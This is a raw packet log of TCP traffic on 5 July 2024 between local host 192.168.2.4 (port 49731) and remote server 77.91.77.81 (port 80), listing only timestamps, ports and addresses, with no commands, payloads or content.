                                                                Jul 5, 2024 04:36:13.387284994 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387293100 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387305021 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387314081 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387330055 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387339115 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387392998 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387392998 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387485027 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387495995 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387506962 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387516975 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387527943 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387538910 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387551069 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387561083 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387572050 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387577057 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387583971 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387619972 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387625933 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387638092 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387641907 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387648106 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387660027 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387670994 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387681007 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387692928 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387702942 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387708902 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387721062 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387723923 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387765884 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387797117 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387799978 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387814999 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387828112 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387837887 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387842894 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387849092 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387861013 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387866020 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387872934 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.387887001 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.387921095 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440315008 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440324068 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440340996 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440351963 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440362930 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440382004 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440392017 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440397024 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440442085 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440491915 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440505028 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440522909 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440535069 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440547943 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440551996 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440562963 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440571070 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440579891 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440601110 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440610886 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440615892 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440623999 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440634012 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440639019 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440646887 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440658092 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440659046 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440696955 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440700054 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440735102 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440747023 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440754890 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440789938 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440793991 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440793991 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440802097 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440831900 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440831900 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440844059 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440857887 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440871000 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440880060 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440885067 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.440901995 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440927029 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.440927982 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.441009045 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.441025019 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.441035986 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.441046000 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.441056013 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.441066980 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.441072941 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.441087008 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.441095114 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.441104889 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.441107035 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.441123009 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.441132069 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.441140890 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.441142082 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.441162109 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.441185951 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.480264902 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480283976 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480293989 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480333090 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480390072 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.480428934 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.480766058 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480775118 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480781078 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480798960 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480808020 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480818987 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480844021 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.480880976 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.480896950 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480909109 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480916977 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480948925 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480951071 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.480961084 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480972052 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.480973005 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.480993032 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481023073 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481110096 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481122017 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481131077 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481142044 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481153965 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481159925 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481165886 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481178045 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481199026 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481205940 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481219053 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481229067 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481240034 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481249094 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481249094 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481298923 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481302977 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481314898 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481323957 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481375933 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481559038 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481570005 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481580019 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481589079 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481600046 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481610060 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481611013 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481623888 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481635094 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481636047 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481647968 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481656075 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481657982 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481671095 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481681108 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481686115 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481693029 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481704950 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481717110 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481729031 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481730938 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481750965 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481770039 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481854916 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481864929 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481874943 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481889009 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481899977 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481901884 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481909990 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481921911 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481924057 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481933117 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481944084 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481955051 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481961966 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.481966972 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481978893 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481991053 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.481997013 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482018948 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482019901 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482032061 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482037067 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482070923 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482111931 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482121944 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482136011 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482145071 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482158899 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482182980 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482201099 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482285976 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482296944 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482306004 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482321024 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482332945 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482332945 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482342958 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482355118 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482361078 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482373953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482386112 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482397079 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482397079 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482402086 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482414961 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.482424021 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482445955 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.482484102 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530467033 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530508995 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530519962 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530539036 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530581951 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530586004 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530586958 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530594110 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530605078 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530615091 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530623913 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530668020 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530688047 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530689001 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530699015 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530709982 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530721903 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530730963 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530730963 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530766010 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530776978 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530787945 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530787945 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530798912 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530807972 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530824900 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530829906 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530841112 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530849934 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530858040 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530859947 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530894041 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530927896 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530939102 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530950069 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530958891 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530968904 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530983925 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.530988932 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.530998945 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.531012058 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.531042099 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.531054020 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.531065941 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.531075954 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.531084061 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.531100988 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.531132936 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570024014 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570077896 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570087910 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570097923 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570137024 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570138931 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570148945 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570161104 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570185900 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570218086 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570324898 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570334911 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570358038 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570377111 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570411921 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570425987 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570436001 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570446014 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570462942 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570472956 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570476055 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570497990 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570502996 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570514917 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570547104 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570549011 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570549011 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570558071 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570569038 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570586920 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570588112 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570602894 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570609093 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570631027 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570638895 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570651054 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570688009 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570688009 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570724010 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570734024 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570734978 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570771933 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570770979 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570789099 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570794106 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570825100 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570828915 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570836067 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570848942 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570849895 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570873022 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570898056 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.570979118 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.570990086 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571001053 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571012020 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571028948 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571038961 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571042061 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571050882 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571063995 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571068048 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571088076 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571106911 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571108103 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571119070 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571129084 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571142912 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571149111 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571151972 CEST804973177.91.77.81192.168.2.4
